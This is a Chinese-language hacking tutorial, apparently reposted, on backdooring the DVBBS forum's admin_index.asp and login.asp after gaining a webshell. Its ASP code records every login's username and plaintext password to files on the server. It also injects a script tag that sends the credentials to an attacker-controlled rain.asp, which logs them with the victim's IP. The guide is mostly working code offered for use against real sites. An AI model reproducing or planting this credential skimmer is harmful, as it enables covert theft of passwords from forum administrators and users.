| 关键词: rain request Server 密码 asp 918 MapPath Set fsoObject tsObject |
作者:rain[918x] 来自: http//www.918x.com 我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:老办法:修改admin_index.asp得到明文DVBBS后台密码 在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码 这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。 新办法: 方法一:login.asp中Case "chk"下: on error resume next dim rain set lP=server.CreateObject("Adodb.Stream") rain.Open rain.Type=2 rain.CharSet="gb2312" rain.LoadFromFile server.mapPath("918.asp") rain.Position=lp.Size rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.mapPath("918.asp"),2 rain.Close set rain=nothing 这样918.asp将获得全部登陆人的密码,时间和名字。至于admin_index.asp你也可以加在这里只获得管理员的密码。 方法二:如果你有自己的网站: 建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp: <%@codepage=936%><%Response.Expires=0 if request("k")="k" then%> <pre><!--#include file="918.asp"--> <%elseif request("n")<>"" and request("p")<>"" then on error resume next dim rain set rain=server.CreateObject("Adodb.Stream") rain.Open rain.Type=2 rain.CharSet="gb2312" rain.LoadFromFile server.mapPath("918.asp") zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">" rain.Position=0 rain.writetext now&"有大侠以名 "&request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh rain.SaveToFile server.mapPath("918.asp"),2 rain.Close set rain=nothing end if%> 在login.asp那里插入一句: response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里 这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|